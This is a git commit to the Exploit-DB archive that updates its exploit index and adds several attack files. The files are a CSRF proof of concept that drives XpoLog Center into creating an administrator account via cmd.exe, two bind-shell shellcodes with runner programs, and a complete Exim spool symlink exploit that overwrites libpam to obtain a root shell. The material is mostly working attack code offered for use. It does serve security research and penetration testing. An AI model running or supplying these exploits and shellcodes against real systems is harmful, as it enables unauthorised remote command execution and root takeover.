DB: 2016-07-05

8 new exploits

BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities
BigDump 0.29b and 0.32b - Multiple Vulnerabilities

Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption

Debian Exim - Spool Local Root Privilege Escalation

Ubuntu 16.04 local root exploit - netfilter target_offset OOB
Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit
XpoLog Center 6 - Remote Command Execution CSRF
Ktools Photostore 4.7.5 - Multiple Vulnerabilities
Linux 64bit NetCat Bind Shell Shellcode - 64 bytes
WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities
Linux x86 TCP Bind Shell Port 4444 - 98 bytes
WebCalendar 1.2.7 - Multiple Vulnerabilities
eCardMAX 10.5 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-07-05 05:06:28 +00:00
parent aeca36b114
commit b530dd470e
9 changed files with 1258 additions and 3 deletions

View file

@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
38076,platforms/php/webapps/38076.txt,"BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0
@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port
39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80
39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80
@ -36161,6 +36161,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
40054,platforms/linux/local/40054.c,"Debian Exim - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@ -36220,4 +36221,11 @@ id,file,description,date,author,platform,type,port
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
40049,platforms/linux/local/40049.c,"Ubuntu 16.04 local root exploit - netfilter target_offset OOB",2016-07-03,vnik,linux,local,0
40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
40052,platforms/lin_x86-64/shellcode/40052.c,"Linux 64bit NetCat Bind Shell Shellcode - 64 bytes",2016-07-04,CripSlick,lin_x86-64,shellcode,0
40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80
40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80

Can't render this file because it is too large.

98
platforms/jsp/webapps/40050.txt Executable file
View file

@ -0,0 +1,98 @@

XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;cmd&#46;exe"" />
<input type="hidden" name="exeArgs" value=""&#47;C&#32;net&#32;user&#32;EVIL&#32;pass123&#32;&#47;add&#32;&&#32;net&#32;localgroup&#32;Administrators&#32;EVIL&#32;&#47;add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId&#95;1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId&#95;1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="&#45;1" />
<input type="hidden" name="jobPriority" value="&#45;1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system

View file

@ -0,0 +1,40 @@
#include <stdio.h>
#include <string.h>
// Exploit Title: [NetCat Bind Shell 64bit 64byte]
// Date: [6/28/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [v1.10-41]
// ShepherdDowling@gmail.com
// OffSec ID: OS-20614
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
unsigned char code[] = \
#define PORT "\x39\x39"
// Keep to two bytes
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
int main ()
{
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;
}

View file

@ -0,0 +1,265 @@
/*
# Linux x86 TCP Bind Shell Port 4444 (98 bytes)
# Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 98
# SLAE - 750
------------c prog ---poc by sajith shetty----------
#include <sys/types.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
int main(void)
{
int sock_file_des, clientfd;
struct sockaddr_in sock_ad;
//[1]we need to create the socket connection using socket call function
//[*]Man page for socket call
//----->int socket(int domain, int type, int protocol);
// domain = AF_INET (IPv4 Internet protocol family which will be used for communication)
// type = SOCK_STREAM (Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported
// protocol = 0 (The protocol specifies a particular protocol to be used with the socket.Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0.
sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
//[2]Binds the socket to localhost and port (here will use 4444) using bind call.
//[*]Man page for bind call
//------->int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
// sockfd = sock_file_des
// const struct sockaddr *addr = (struct sockaddr *)&sock_ad (bind() assigns the address specified to by addr to the socket referred to by the file descriptor sockfd)
// socklen_t addrlen = sizeof(sock_ad) (addrlen specifies the size, in bytes, of the address structure pointed to by addr.)
sock_ad.sin_family = AF_INET; // Host byte order.(2)
sock_ad.sin_port = htons(4444);// network byte order
sock_ad.sin_addr.s_addr = INADDR_ANY;//(0)bindshell will listen on any address
bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
//[3]Waits for incoming connection using call to listen
//[*]Man page for listen call
//------->int listen(int sockfd, int backlog);
// sockfd = sock_file_des (The sockfd argument is a file descriptor that refers to a socket of type SOCK_STREAM)
// backlog = 0 (The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow)
listen(sock_file_des, 0);
//[4]Accept the connection using call to accept
//[*]Man page to accept call
//------->int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
// sockfd = sock_file_des
// struct sockaddr *addr = NULL (The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer.When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.
// socklen_t *addrlen = NULL
clientfd = accept(sock_file_des, NULL, NULL);
//[5]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
//[*]Man page for dup2 (duplicate a file descriptor)
//------->int dup2(int oldfd, int newfd);
// oldfd = clientfd
// newfd = 0(stdin) , 1(stdout), 2(stderr)
dup2(clientfd, 0); // stdin
dup2(clientfd, 1); // stdout
dup2(clientfd, 2); // stderr
//[6]Execute shell (here we use /bin/sh) using execve call
//[*]Man page for execve call
//------->int execve(const char *filename, char *const argv[],char *const envp[]);
// char *filename = /bin/sh
// char *const argv[] = NULL
// char *const envp[] = NULL
execve("/bin/sh",NULL,NULL);
}
----------------------end of c program--------------
global _start
section .text
_start:
;syscall for socket
;cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket
;#define __NR_socketcall 102 (0x66 in hex)
;sock_file_des = socket(AF_INET, SOCK_STREAM, 0)
;AF_INET = 2 ( bits/socket.h)
;SOCK_STREAM = 1 (bits/socket.h)
;socket(2,1,0)
xor eax, eax ; zero out eax register using XOR operation
xor ebx, ebx ; zero out ebx register using XOR operation
push eax ; move 0 to stack (protocol=0)
mov al, 0x66 ; moves socket call number to al register
mov bl, 0x1 ; moves 0x1 to bl register
push ebx ; value in ebx=1 is pushed in to the stack (sock_stream =1)
push 0x2 ; value 0x2 is pushed onto stack (AF_INET=2)
mov ecx, esp ; save the pointer to args in ecx
int 0x80 ; socket()
mov esi, eax ; store sockfd in esi register
;sock_ad.sin_addr.s_addr = INADDR_ANY;//0, bindshell will listen on any address
;sock_ad.sin_port = htons(4444);// port to bind.(4444)
;sock_ad.sin_family = AF_INET; // TCP protocol (2).
xor edx, edx ; zero out edx register using XOR operation
push edx ; push 0 on to stack (INADDR_ANY)
push word 0x5C11; htons(4444)
push word 0x2 ; AF_INET = 2
mov ecx, esp ; save the pointer to args in ecx
;bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
;cat /usr/include/linux/net.h | grep bind
;bind = 2
mov al, 0x66 ; sys socket call
mov bl, 0x2 ; bind =2
push 0x10 ; size of sock_ad (sizeof(sock_ad))
push ecx ; struct pointer
push esi ; push sockfd (sock_file_des) onto stack
mov ecx, esp ; save the pointer to args in ecx
int 0x80
;listen(sock_file_des, 0);
;cat /usr/include/linux/net.h | grep listen
; listen =4
mov al, 0x66 ; sys socket call
mov bl, 0x4 ; listen=4
push edx ; push 0 onto stack (backlog=0)
push esi ; sockfd (sock_file_des )
mov ecx, esp ; save the pointer to args in ecx
int 0x80
;clientfd = accept(sock_file_des, NULL, NULL)
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
;cat /usr/include/linux/net.h | grep accept
; accept=5
mov al, 0x66 ; sys socket call
mov bl, 0x5 ; accept =5
push edx ; null value socklen_t *addrlen
push edx ; null value sockaddr *addr
push esi ; sockfd (sock_file_des )
mov ecx, esp ; save the pointer to args in ecx
int 0x80
;int dup2(int oldfd, int newfd);
;dup2(clientfd, 0); // stdin
;dup2(clientfd, 1); // stdout
;dup2(clientfd, 2); // stderr
mov ebx, eax ;move client fd to ebx
xor ecx, ecx ; xor to clear out ecx
mov cl, 3 ; counter to loop 3 times
loopinghere:
mov al, 0x3f ; sys call for dup2
int 0x80
dec cl ; decrement till 0
jns loopinghere ; loop as long sign flag is not set
;Execute shell (here we use /bin/sh) using execve call
;execve("//bin/sh",["//bin/sh"])
mov al, 11 ; execve
push edx ; push null
push 0x68732f6e ; hs/b
push 0x69622f2f ; ib//
mov ebx,esp ; save pointer
push edx ; push null
push ebx ; push pointer
mov ecx,esp ; save pointer
int 0x80
-------------obj dump------------
finalcode: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 50 push eax
8048065: b0 66 mov al,0x66
8048067: b3 01 mov bl,0x1
8048069: 53 push ebx
804806a: 6a 02 push 0x2
804806c: 89 e1 mov ecx,esp
804806e: cd 80 int 0x80
8048070: 89 c6 mov esi,eax
8048072: 31 d2 xor edx,edx
8048074: 52 push edx
8048075: 66 68 11 5c pushw 0x5c11
8048079: 66 6a 02 pushw 0x2
804807c: 89 e1 mov ecx,esp
804807e: b0 66 mov al,0x66
8048080: b3 02 mov bl,0x2
8048082: 6a 10 push 0x10
8048084: 51 push ecx
8048085: 56 push esi
8048086: 89 e1 mov ecx,esp
8048088: cd 80 int 0x80
804808a: b0 66 mov al,0x66
804808c: b3 04 mov bl,0x4
804808e: 52 push edx
804808f: 56 push esi
8048090: 89 e1 mov ecx,esp
8048092: cd 80 int 0x80
8048094: b0 66 mov al,0x66
8048096: b3 05 mov bl,0x5
8048098: 52 push edx
8048099: 52 push edx
804809a: 56 push esi
804809b: 89 e1 mov ecx,esp
804809d: cd 80 int 0x80
804809f: 89 c3 mov ebx,eax
80480a1: 31 c9 xor ecx,ecx
80480a3: b1 03 mov cl,0x3
080480a5 <loopinghere>:
80480a5: b0 3f mov al,0x3f
80480a7: cd 80 int 0x80
80480a9: fe c9 dec cl
80480ab: 79 f8 jns 80480a5 <loopinghere>
80480ad: b0 0b mov al,0xb
80480af: 52 push edx
80480b0: 68 6e 2f 73 68 push 0x68732f6e
80480b5: 68 2f 2f 62 69 push 0x69622f2f
80480ba: 89 e3 mov ebx,esp
80480bc: 52 push edx
80480bd: 53 push ebx
80480be: 89 e1 mov ecx,esp
80480c0: cd 80 int 0x80
-----------------------------------------------
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68"
"\x11\x5c" // port number 4444
"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

280
platforms/linux/local/40054.c Executable file
View file

@ -0,0 +1,280 @@
/*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hello List,
This is just a minor issue in Exim, no replies so far, so publication
should be OK.
Introduction:
============
Exim4 in some variants is started as root but switches to uid/gid
Debian-exim/Debian-exim. But as Exim might need to store received
messages in user mailboxes, it has to have the ability to regain
privileges. This is also true when Exim is started as "sendmail".
During internal operation, sendmail (Exim) will manipulate message
spool files in directory structures owned by user "Debian-exim"
without caring about symlink attacks. Thus execution of code as
user "Debian-exim" can be used to gain root privileges by invoking
"sendmail" as user "Debian-exim".
POC:
===
http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
demonstrates the issue using a ELF file being both executable
and shared library which is invoked multiple times by different
processes.
Results, Discussion:
===================
As Exim4 process itself is already quite privileged - it has to
access the user mailboxes with different UIDs anyway - the having
such problems is expectable and explainable. A change in documentation
might make sense, to indicate, that the special user "Debian-exim"
is only intended to mark files being used by the daemon, but not
to provide root/daemon user privilege separation.
Even without this vulnerability, a "Debian-exim" process could
use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
to escalate to "adm" group, which again makes it very likely to
use "syslog", "apache" or other components to escalate to root
via "/var/log". This is annoying, perhaps this should get a CVE
to make daemon-to-root escalations harder in general.
Timeline:
========
20160605: Discovery, report Debian security
20160607: Writeup
20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
20160630: Publication
References:
==========
* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
-----BEGIN PGP SIGNATURE-----
iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
=4IJk
-----END PGP SIGNATURE-----
* This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* for more information.
*
* Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
* Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
*/
#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
#define UPGRADE_LIB_DIR "/var/spool/exim4"
#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
extern char **environ;
#if defined(__x86_64__)
const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
#define init_args(argc, argv) __asm__ volatile ( \
"mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
:"=m"(argc), "=r"(argv)::"memory")
#endif /* __x86_64__ */
/** Library initialization function, called by the linker. If not
* named _init, parameter has to be set during linking using -init=name
*/
extern void _libInit() {
if(geteuid()!=0) return;
int result=chown(UPGRADE_FILE_NAME, 0, 0);
assert(!result);
result=chmod(UPGRADE_FILE_NAME, 04755);
assert(!result);
exit(0);
}
extern void _entry (void) {
int argc=0;
char **argv = NULL;
init_args(argc, argv);
int result=main(argc, argv);
exit(result);
}
extern void pam_start() {}
extern void pam_set_item() {}
extern void pam_chauthtok() {}
extern void pam_end() {}
extern void pam_strerror() {}
extern void pam_getenvlist() {}
extern void pam_open_session() {}
extern void pam_close_session() {}
extern void pam_get_item() {}
extern void pam_acct_mgmt() {}
extern void pam_setcred() {}
extern void pam_authenticate() {}
int main(int argc, char **argv) {
DIR *dirStruct;
struct dirent *dirEnt;
char linkPath[1024];
int result;
assert(argc>1);
if(!strcmp(argv[1], "--Exec")) {
setresgid(0, 0, 0);
setresuid(0, 0, 0);
execve(argv[2], argv+2, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
if(!strcmp(argv[1], "--Repair")) {
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
assert(!result);
chmod(TARGET_PATH, atoi(argv[4]));
return(0);
}
if(!strcmp(argv[1], "--Upgrade")) {
struct stat origStatData;
stat(TARGET_PATH, &origStatData);
char *execArgs[6];
int childPid=fork();
if(!childPid) {
int inputFd=open("/dev/null", O_RDONLY);
dup2(inputFd, 0);
execArgs[0]="/usr/sbin/sendmail";
execArgs[1]="root@localhost";
execArgs[2]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
dirStruct=opendir("/var/spool/exim4/msglog");
assert(dirStruct);
result=1;
while(result) {
while((dirEnt=readdir(dirStruct))) {
if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
strncpy(linkPath+23, dirEnt->d_name, 16);
result=symlink(TARGET_PATH, linkPath);
assert(!result);
fprintf(stderr, "Relinked %s\n", linkPath);
break;
}
rewinddir(dirStruct);
}
closedir(dirStruct);
while(1) {
struct stat currentStatData;
stat(TARGET_PATH, &currentStatData);
if(currentStatData.st_uid!=origStatData.st_uid) break;
sleep(1);
}
waitpid(childPid, NULL, 0);
fprintf(stderr, "Target ready for writing\n");
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
char *origData=(char*)malloc(origStatData.st_size);
result=read(targetFd, origData, origStatData.st_size);
assert(result==origStatData.st_size);
struct stat newStatData;
stat(UPGRADE_FILE_NAME, &newStatData);
char *newData=(char*)malloc(newStatData.st_size);
int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
result=read(selfFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
close(selfFd);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
fsync(targetFd);
childPid=fork();
if(!childPid) {
execArgs[0]="/bin/su";
execArgs[1]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, origData, origStatData.st_size);
close(targetFd);
childPid=fork();
if(!childPid) {
char numbers[128];
char *ptr=numbers;
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Repair";
result=sprintf(ptr, "%d", origStatData.st_uid);
execArgs[2]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_gid);
execArgs[3]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_mode);
execArgs[4]=ptr;
execArgs[5]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Exec";
execArgs[2]="/bin/bash";
execArgs[3]="-c";
execArgs[4]="id; exec $0";
execArgs[5]=NULL;
execve(execArgs[0], execArgs, environ);
return(1);
}
fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
return(1);
}

99
platforms/php/webapps/40051.txt Executable file
View file

@ -0,0 +1,99 @@
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
#
# Sell various sizes or formats of the same photo.
# Sell photos, vector art, zip files and more.
# Sell videos PhotoStore Pro Only
# Sell prints, artwork, products, packages, digital collections and more.
# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
# Email notifications to both you and the customer upon purchase.
# Customers can instantly download after payment.
# Customers can instantly download their files after payment.
# Connects to PayPal and 2Checkout.
# Built in credit system to allow your customers to buy credits.
# Allow your members to upload and sell their photos and other media while you take a commission.
